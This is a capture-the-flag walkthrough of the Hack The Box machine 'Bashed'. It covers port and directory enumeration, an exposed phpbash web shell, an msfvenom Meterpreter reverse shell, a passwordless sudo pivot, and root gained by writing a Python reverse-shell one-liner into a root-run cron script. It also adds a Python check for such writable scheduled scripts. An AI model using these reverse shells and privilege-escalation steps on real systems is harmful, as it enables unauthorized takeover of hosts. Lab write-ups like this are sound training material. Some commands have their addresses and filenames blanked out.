Bashed – Hack The Box


I will skip the usual "add the host IP to /etc/hosts" preamble.

Enumerate ports:

nmap -p- bashed.htb
Starting Nmap 7.93 ( ) at 2023-01-09 10:35 EST
Nmap scan report for bashed.htb (
Host is up (0.066s latency).
Not shown: 65534 closed tcp ports (conn-refused)
80/tcp open  http

Visit the URL at http://bashed.htb/

Quickly enumerate directories with dirb:

$ dirb http://bashed.htb/ 

DIRB v2.22    
By The Dark Raver

START_TIME: Mon Jan  9 10:36:05 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/                                                                                   
==> DIRECTORY: http://bashed.htb/dev/

A directory called /dev/ on a web server is worth a guess: append /phpbash.php to it, and voilà. phpbash is a browser-based shell, so this gives command execution on the box as www-data straight away.

User pwned.

PS: It is even easier if you click on the article link in the home page.

Onto r0ot!

First, let's get a Meterpreter reverse shell to make our lives easier:

In Kali:

$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f elf -o shelly.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shelly.elf

$ python3 -m http.server 80
Serving HTTP on port 80 ( ... - - [09/Jan/2023 10:47:32] "GET /shelly.elf HTTP/1.1" 200 -

$ msfconsole   
msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost
lhost =>
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > run

In http://bashed.htb/dev/phpbash.php:

www-data@bashed:/tmp# cd /tmp
www-data@bashed:/tmp# wget

--2023-01-09 07:47:43--
Connecting to connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: 'shelly.elf'

0K 100% 996K=0s

2023-01-09 07:47:43 (996 KB/s) - 'shelly.elf' saved [250/250]

www-data@bashed:/tmp# chmod 755 shelly.elf
www-data@bashed:/tmp# ./shelly.elf

Back in Kali:

[*] Started reverse TCP handler on 
[*] Sending stage (3045348 bytes) to
[*] Meterpreter session 1 opened ( -> at 2023-01-09 10:49:43 -0500

meterpreter > getuid
Server username: www-data

I could get root quickly with the exploit/linux/local/bpf_sign_extension_priv_esc module, since this is a 5-year-old machine, but I want to look around for the intended path first.

The first thing to check is sudo. sudo -l shows that www-data may run any command as scriptmanager without a password, which makes the pivot to that user trivial:

$ sudo -l 
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
$ sudo -u scriptmanager bash -i
$ id
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)

When out of ideas, pull a local enumeration script onto the box the same way as before and run it:

$ cd /tmp
$ wget
$ chmod 755
$ ./

Interesting: there is a /scripts directory. Let's investigate:

$ ls -hali /scripts
total 16K
34468 drwxrwxr--  2 scriptmanager scriptmanager 4.0K Jun  2  2022 .
    2 drwxr-xr-x 23 root          root          4.0K Jun  2  2022 ..
43823 -rw-r--r--  1 scriptmanager scriptmanager   58 Dec  4  2017
34781 -rw-r--r--  1 root          root            12 Jan  9 08:19 test.txt

$ cat
f = open("test.txt", "w")
f.write("testing 123!")

$ cat test.txt 
testing 123!
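That ls output is exactly the kind of thing worth scripting rather than eyeballing. The following is an added example, not code from the original writeup: it checks the two conditions this privesc relies on, namely that we can write to a file in the directory (or to the directory itself) and that a file in the same directory was recently written by the privileged account, which suggests that account runs something there on a schedule. The function and helper names are my own, and the sample directory it builds is constructed for the demo; on the real box you would point it at /scripts with privileged_uid=0.

```python
import os
import stat
import tempfile
import time

# Added example, not code from the original writeup. The two conditions the
# /scripts privesc relies on, written as a check:
#   1. a file in the directory is writable by us (or the directory itself is,
#      in which case any file in it can be replaced);
#   2. a file in the directory is owned by the privileged account and was
#      modified recently, which suggests that account runs something there
#      on a schedule.

CURRENT_UID = os.getuid()


def find_writable_and_fresh(dirpath, privileged_uid=0, max_age_s=600, now=None):
    """Return which regular files in dirpath we can overwrite and which were
    recently written by privileged_uid (root by default)."""
    now = time.time() if now is None else now
    result = {
        "dir_writable": os.access(dirpath, os.W_OK),  # can rename/replace any file
        "writable": [],
        "fresh_privileged": [],
    }
    for name in sorted(os.listdir(dirpath)):
        path = os.path.join(dirpath, name)
        st = os.lstat(path)  # lstat: do not follow symlinks planted by others
        if not stat.S_ISREG(st.st_mode):
            continue
        if os.access(path, os.W_OK):
            result["writable"].append(name)
        if st.st_uid == privileged_uid and now - st.st_mtime <= max_age_s:
            result["fresh_privileged"].append(name)
    return result


def build_demo_dir():
    """Constructed sample layout standing in for /scripts on the box: a script
    owned by us, a freshly written output file, and one stale file."""
    d = tempfile.mkdtemp(prefix="scripts_demo_")
    with open(os.path.join(d, "demo.py"), "w") as f:
        f.write('f = open("test.txt", "w")\nf.write("testing 123!")\n')
    with open(os.path.join(d, "test.txt"), "w") as f:
        f.write("testing 123!")
    stale = os.path.join(d, "old.txt")
    with open(stale, "w") as f:
        f.write("x")
    os.utime(stale, (0, 0))  # mtime in 1970: not a sign of a live job
    return d


if __name__ == "__main__":
    # On the real box you would call this with privileged_uid=0 on /scripts.
    # In the demo every file is ours, so we pass our own uid to exercise the check.
    print(find_writable_and_fresh(build_demo_dir(), privileged_uid=CURRENT_UID))
```

Both lists being non-empty for the same directory is the signal: a file you control is sitting next to a file a privileged user keeps rewriting, so whatever job does the rewriting is a candidate for hijacking.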

test.txt is owned by root and has a timestamp from minutes ago, while the script that writes it is owned by scriptmanager and lives in a directory scriptmanager can write to. That means root is almost certainly running the script on a schedule, and anything we put in it will run as root. (The script opens test.txt with a relative path, so the job runs with /scripts as its working directory.) Let's put a reverse shell in there (this time without Metasploit, for the fun of it). Run this locally:

$ nc -lvnp 6666

And on the remote machine as scriptmanager:

$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > /scripts/

$ cat /scripts/
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",6666));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

After a few seconds, we get a connection back from root and we find the flag:

$ nc -lvnp 6666      
listening on [any] 6666 ...
connect to [] from (UNKNOWN) [] 37194

# id
uid=0(root) gid=0(root) groups=0(root)

# cat /root/root.txt

What did we learn from this machine? It pays to resist the urge to grab an easy Metasploit exploit; this was undoubtedly a more interesting path. The underlying bug is also a common one outside CTFs: a privileged scheduled job executing a file that a low-privilege user can edit.